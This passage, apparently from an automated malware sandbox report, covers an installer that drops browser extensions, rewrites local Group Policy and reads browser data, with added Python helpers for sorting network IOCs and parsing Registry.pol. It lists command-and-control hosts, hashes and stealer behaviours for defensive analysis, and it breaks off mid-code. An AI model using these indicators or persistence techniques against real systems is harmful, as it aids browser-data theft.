US       3.80.150.121:443      service-domain.xyz                  tcp
US       8.8.8.8:53            121.150.80.3.in-addr.arpa           udp
US       8.8.8.8:53            74.90.14.23.in-addr.arpa            udp
US       8.8.8.8:53            11.97.55.23.in-addr.arpa            udp
US       8.8.8.8:53            202.184.250.142.in-addr.arpa        udp
US       8.8.8.8:53            99.18.217.172.in-addr.arpa          udp
US       8.8.8.8:53            clients2.google.com                 udp
DE       216.58.206.46:443     clients2.google.com                 tcp
US       8.8.8.8:53            clients2.googleusercontent.com      udp
DE       142.250.186.65:443    clients2.googleusercontent.com      tcp
US       8.8.8.8:53            65.186.250.142.in-addr.arpa         udp
US       8.8.8.8:53            46.206.58.216.in-addr.arpa          udp
DE       216.58.206.46:443     clients2.google.com                 tcp
US       8.8.8.8:53            api2.check-data.xyz                 udp
US       44.239.141.158:80     api2.check-data.xyz                 tcp
US       8.8.8.8:53            158.141.239.44.in-addr.arpa         udp
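
Most rows in the table are DNS to 8.8.8.8, and most of those are PTR (`in-addr.arpa`) queries rather than forward lookups; two of them (121.150.80.3 and 158.141.239.44) reverse the very addresses the sample connected to a moment earlier. The actual outbound connections are three: `service-domain.xyz` on 443, `api2.check-data.xyz` on plain HTTP port 80, and a bare `138.91.171.81:80` with no preceding name lookup (so that request body is inspectable in the capture and the IP itself is the indicator). The `clients2.google.com` / `clients2.googleusercontent.com` traffic is Chrome's extension-update endpoint, which is expected noise on a host where extensions were just dropped. The following script is an added example for this report, not sandbox code: it parses rows in the table's format, separates PTR queries, forward lookups and multicast chatter from real connections, and cross-references the reverse lookups against the connected IPs. An empty Domain cell is written as `-` (the raw three-field form is also accepted), and the benign-suffix allowlist is the author's choice.

```python
"""Sort the Network table above into lookups, noise and connection IOCs.

Added example written for this report, not sandbox code and not code from
the sample. ROWS copies rows from the table above; an empty Domain cell is
written as '-' (a raw row that simply omits the field is accepted too).
The allowlist of benign suffixes is the author's choice.
"""
import ipaddress

ROWS = """\
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 138.91.171.81:80 - tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.239.141.158:80 api2.check-data.xyz tcp
US 8.8.8.8:53 158.141.239.44.in-addr.arpa udp
"""

# Infrastructure the browser/OS contacts on its own; author's allowlist.
BENIGN_SUFFIXES = ('.google.com', '.googleusercontent.com')


def parse_rows(text):
    """Yield one dict per table row; tolerate a missing or '-' Domain cell."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            (country, dest, proto), domain = parts, ''
        else:
            continue
        ip, port = dest.rsplit(':', 1)
        yield {'country': country, 'ip': ip, 'port': int(port),
               'domain': '' if domain == '-' else domain, 'proto': proto.lower()}


def ptr_to_ip(name):
    """Undo a reverse-lookup name: '28.118.140.52.in-addr.arpa' -> '52.140.118.28'."""
    return '.'.join(reversed(name[:-len('.in-addr.arpa')].split('.')))


def triage(text):
    """Split rows into PTR targets, forward lookups, connections and IOCs."""
    ptr, lookups, conns = set(), set(), []
    for r in parse_rows(text):
        if r['proto'] == 'udp' and r['port'] == 53:
            if r['domain'].endswith('.in-addr.arpa'):
                ptr.add(ptr_to_ip(r['domain']))      # PTR query: who owns this IP?
            elif r['domain']:
                lookups.add(r['domain'])             # forward (A) query
        elif r['proto'] == 'udp' and ipaddress.ip_address(r['ip']).is_multicast:
            continue                                 # mDNS chatter from the guest OS
        elif r['proto'] == 'tcp':
            conns.append((r['domain'] or r['ip'], r['ip'], r['port']))
    contacted = {ip for _, ip, _ in conns}
    return {
        'ptr_targets': sorted(ptr, key=ipaddress.ip_address),
        'ptr_of_connections': sorted(ptr & contacted, key=ipaddress.ip_address),
        'lookups': sorted(lookups),
        'connections': conns,
        'iocs': sorted({c for c in conns if not c[0].endswith(BENIGN_SUFFIXES)}),
    }


if __name__ == '__main__':
    for key, value in triage(ROWS).items():
        print(key, value)
```

The `iocs` list is what goes into a blocklist or a network-sensor rule; `ptr_of_connections` is worth a second look because reverse-resolving one's own C2 addresses is not something ordinary installers do.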

Files

C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe

MD5 6248fde83e7929ff0561fd033b68d11c
SHA1 2ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA256 66959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA512 80bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33

memory/3208-8-0x0000000000E30000-0x00000000014EE000-memory.dmp

memory/3208-9-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/544-13-0x0000000073240000-0x00000000739F0000-memory.dmp

memory/544-12-0x0000000004930000-0x0000000004966000-memory.dmp

memory/544-14-0x0000000000C80000-0x0000000000C90000-memory.dmp

memory/544-16-0x0000000004FA0000-0x00000000055C8000-memory.dmp

memory/544-15-0x0000000000C80000-0x0000000000C90000-memory.dmp

memory/544-17-0x0000000004ED0000-0x0000000004EF2000-memory.dmp

memory/544-18-0x00000000057C0000-0x0000000005826000-memory.dmp

memory/544-19-0x0000000005830000-0x0000000005896000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4jmtjf35.to3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/544-29-0x00000000059D0000-0x0000000005D24000-memory.dmp

memory/544-30-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

memory/544-31-0x0000000005F20000-0x0000000005F6C000-memory.dmp

memory/544-34-0x0000000073240000-0x00000000739F0000-memory.dmp

memory/3208-38-0x0000000000E30000-0x00000000014EE000-memory.dmp

memory/4456-40-0x0000000000C70000-0x000000000132E000-memory.dmp

memory/4456-41-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/3052-44-0x0000000073330000-0x0000000073AE0000-memory.dmp

memory/3052-46-0x00000000036A0000-0x00000000036B0000-memory.dmp

memory/3052-45-0x00000000036A0000-0x00000000036B0000-memory.dmp

memory/3052-56-0x00000000047E0000-0x0000000004B34000-memory.dmp

memory/3052-57-0x0000000004C20000-0x0000000004C6C000-memory.dmp

memory/3052-60-0x0000000073330000-0x0000000073AE0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 28854213fdaa59751b2b4cfe772289cc
SHA1 fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA256 7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA512 1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

memory/4928-62-0x0000000073330000-0x0000000073AE0000-memory.dmp

memory/4928-63-0x0000000001B50000-0x0000000001B60000-memory.dmp

memory/4928-64-0x0000000001B50000-0x0000000001B60000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a6c3c61bbc81c19401654951e4ebed6
SHA1 d5dfe9c03d1c0dd76daa9fad7f78be758390700f
SHA256 ec4af60b0419302df816d665908de228c45716605d19065e0bd9471cb8b710d9
SHA512 8bd3ec9ebe2921eb01204d2bcb67da8c050519a3e19ffb1f23482570df3aae55cbe1a79938582f9d4edd4e63647571e0c19b0d99a7538f97a1002e14f22e65ad

memory/4928-76-0x0000000073330000-0x0000000073AE0000-memory.dmp

memory/696-79-0x00007FFB19E30000-0x00007FFB1A8F1000-memory.dmp

memory/696-80-0x0000019299AF0000-0x0000019299B00000-memory.dmp

memory/696-81-0x00000192FF880000-0x00000192FF8A2000-memory.dmp

memory/696-91-0x0000019299AF0000-0x0000019299B00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 903c54d0f62b7011825a451f5a81ede3
SHA1 066a02609a2f69af6cc2ec6e961392b6256c58cf
SHA256 ec18b54a6c89301b21d9cdfefb1a563fea05c0c40764308647d65f79436d1c86
SHA512 95ee65dd3d5df495cc7eb78cda883150138a38e0ec396c4a30e9659120301372ec4d2943eee5ce702d5a2c52f78e3368ccf51c671ab5bc472e2e4a82fe2004fb

memory/696-95-0x00007FFB19E30000-0x00007FFB1A8F1000-memory.dmp

memory/4456-96-0x0000000000C70000-0x000000000132E000-memory.dmp

memory/4456-101-0x0000000000C70000-0x000000000132E000-memory.dmp

memory/4628-102-0x00000000009F0000-0x00000000010AE000-memory.dmp

memory/4628-103-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/4628-114-0x00000000023B0000-0x0000000002435000-memory.dmp

memory/2536-115-0x0000000072F80000-0x0000000073730000-memory.dmp

memory/2536-118-0x0000000003C80000-0x0000000003C90000-memory.dmp

memory/2536-122-0x0000000004C00000-0x0000000004F54000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 68ec4c9163e8df51afda69a05eac9b8a
SHA1 8d9094bfaf0669d7d40f31a839c3844720bfcc88
SHA256 33377d4dd62efc7a3bfb480d44b98008c9ffbe20cc102b70d9bf03e9028609c9
SHA512 4d52b0a351a078f32b7ef3e19420f86bc1b835a9b45bff354cfc625c88792d21db7f8d0898ab66cefb5ca6bab47478da275d34cf851c14acb6453cdb6edce573

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 678449db0c19440d6e80f5b233fea5be
SHA1 57ac3f8e4db80d8980020252e8e412271c2157b6
SHA256 a58e6cbd6749cf00d2bd5d8f82ac5c89d2c3534f2e75a5f80bbf88e159e4fd25
SHA512 9d1864417c240930e65e2e00a84863e93681bb2e1dc0b65fa4e57d79c8c5906d7eb46e62e5b9d2b51046a69f56e31703c0ad9e9c6a0fc958df945ff7041d7baa

memory/2536-160-0x00000000057F0000-0x000000000583C000-memory.dmp

memory/2536-165-0x0000000072F80000-0x0000000073730000-memory.dmp

memory/4628-172-0x0000000002CD0000-0x0000000002D34000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 2eed991e6e31d306e68ef64d773d3e16
SHA1 27b5035255d679a7015d1a2e5bfcc5f124160689
SHA256 3b839645035f3ad69591e7e9db4967a695877782e57703ee61d64eeb11be7fa1
SHA512 d124006d52504010a7dd99599e58b026c28febe793e77609b6151152a7d3765cc52f3fec504680f7d9b08e183d3190858580c7035f9d95990292241535d40404

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml

MD5 ef079aaef1f906e42885bbc7d4d35de0
SHA1 72a4a1e024062fb94baf95a8a9369a21a7dd0ce6
SHA256 73f9e05dcb26f2e9091df88bfefb24d6c3ca93d8c1ca25ed3c17e25c7191ecf3
SHA512 31214f2d81c28e25030e19d355b13a004d82c4e9180b93c9775d268d5666f72591bc17f117c006f5632ebd713a107562c8df65feadc33084cf63db399c933b72

C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml

MD5 24d95524410ce69f7d00cbb177e7063a
SHA1 0e3f50d0460d2e080de165e6cebec882b0ba8c66
SHA256 6ce6ff73a40b18b9a80b6f50f58737d2a086495f55f0e6be5c83975eea7a356b
SHA512 395b66a348a61a329967c04ccc588b2aac1ff2e629d372ae95f2bcf405978c17aada726137a2fdc55f70f86c7fca89c6359474cc01c5bdee25ce0469d18669dd

C:\ProgramData\qgjSpVnHOWlNdqVB\UTmTfNY.xml

MD5 d188cd4730ba590320b50f713f226c15
SHA1 54ead28d533e6f83caf4e67803a6df5122765f39
SHA256 b6a8fdea0faf9e3aee8d8b78bbdf72a32ca1487882337dffb1ca6998b04a2d12
SHA512 95c0e266a39cbec9a76676ee39073f11a317f7cbac0725d47bed95ea05f26883e1aaed1159be1714eaae613264cfc3dd369702d42c216e7b41e43ee13158b6b4

C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\dbotFoU.xml

MD5 ac468f310e3b41f01c4f5b01b5eb6ebd
SHA1 46b754310373f471d3416007f93625a36ada51cc
SHA256 fa0ba5ab1115cd219b12907d9d8371b76e6406ab592e2016a49e7006825531ef
SHA512 1d255cf9da83ea0784af636b1872edd860d6de44df6a8c2e6731ea01d89a6b7dace6c939e2a73d0a0bbdfcec52f8aab95e4afb3805c12be60d90051ebfb2d848

C:\Program Files (x86)\ycfBUKIjHxeOC\DSqYrZi.xml

MD5 7ced44a4597f84a3465330016b6ae6c2
SHA1 f51191faa614fd36c966a581b57a184c9ccdeea7
SHA256 8506fcdf097b836180c54c6b67d1433cd48d0dbb9fd231b0929408e85bbe935d
SHA512 fa2c85423fd69d5c4e8fcacdfe8751d32cd1b147e3619272cbbf038584b8856a7fc5003503aeb4b74cffdbb1cd9cd4a794ea5b10ae077c8d8cf2f815921ce5c5

C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll

MD5 db0e0228f220bd8fa3b45a0043744456
SHA1 e287442ab5c21cab796c6893a34f0474820b6515
SHA256 9d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512 a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763

memory/4628-502-0x0000000003780000-0x0000000003803000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3e5zl51i.default-release\prefs.js

MD5 b9d29e6b972000e5a0a8f23aa2b59474
SHA1 c8fc5f29e2f3e0b24effe96e34725bbdb63205c7
SHA256 ff995a3116e33ace0876cab389c16288acf9ae51e11c1951fabae69c9d4bb2a8
SHA512 5d48e156462a397eaa3d510f4c7030b396ac3936066ed1f612be92231b1d831ff9e0bde04af741b55f5ac13d9c34fd072b260b9b53a9e981c2bf39dd275b4991

memory/4628-517-0x0000000003810000-0x00000000038DF000-memory.dmp

memory/4948-519-0x0000000001AE0000-0x00000000020B3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f7e4d801190784fab27905b5a1e7647c
SHA1 58d89d1529c012611d697ad8bc7c89b118ec890f
SHA256 985c2914e0ababa35f526951fdf1126f1a62151c230a2681a5bde10c395b0143
SHA512 351ada10a303c11a9ca44bbd474d7991efc28bb5aa840153a2d6c435a5f6f45e1d1b762ab037919def8b3c39de358018a2df67b0ab171533afbe6590144d1c00

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 71766891f1f2e0fea4dec97395dd444d
SHA1 a7e3c9f0721698f70b6287359c9ccbf646660435
SHA256 a2489f5e8f06027cbe8b8bc2d4ac6cd422358a782718b2b119c130bd116558a3
SHA512 f5a6c615c2b3046053a7cdb2a3ab02b8aa2af9839e4f922bfb8c8f66fa0abda6a3818a58e87d82ceeee3ef67c34673dcceb34409eb17980f2e0e0728f5c6918e

memory/3208-576-0x0000000000E30000-0x00000000014EE000-memory.dmp

memory/4628-581-0x00000000009F0000-0x00000000010AE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-07 17:00

Reported

2024-04-07 17:03

Platform

win11-20240221-en

Max time kernel

141s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
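
Two rows in this table deserve more attention than the CryptnetUrlCache noise around them: the dropped `LwcHoZo.exe` creates `C:\Windows\system32\GroupPolicy\gpt.ini` and `C:\Windows\system32\GroupPolicy\Machine\Registry.pol`, and `ZBAfLYQ.exe` later opens `Registry.pol` for modification. That file is the machine half of the local Group Policy object; whatever registry-based policy it contains is applied at the next policy refresh, and a fresh `gpt.ini` bumps the version so the refresh actually happens. The report records the file and its hashes but not its contents, so the only way to learn what policy was set is to read the file from the host. The parser below is an added example written for this report, not sandbox code: it reads the documented PReg format (a `PReg` signature, version 1, then `[key;value;type;size;data]` records in UTF-16LE with 4-byte little-endian type and size fields) and also serialises entries so the round trip can be checked. The entries in `SAMPLE_ENTRIES` are constructed placeholders to exercise the parser; nothing in them is recovered from the sample.

```python
"""Read a machine Registry.pol such as the one LwcHoZo.exe created.

Added example for this report; it is not code from the sandbox or the
sample. Registry.pol is the local Group Policy registry store (PReg
format: 'PReg' header, version 1, then [key;value;type;size;data]
records in UTF-16LE). The report lists the file but not its contents, so
SAMPLE_ENTRIES are constructed placeholders, not the sample's policy.
"""
import struct

REG_SZ, REG_DWORD, REG_MULTI_SZ = 1, 4, 7


def _u16(s: str) -> bytes:
    return s.encode('utf-16-le')


def encode_data(rtype, value) -> bytes:
    """Encode a Python value as the raw registry data for rtype."""
    if rtype == REG_DWORD:
        return struct.pack('<I', value)
    if rtype == REG_SZ:
        return _u16(value + '\0')
    if rtype == REG_MULTI_SZ:
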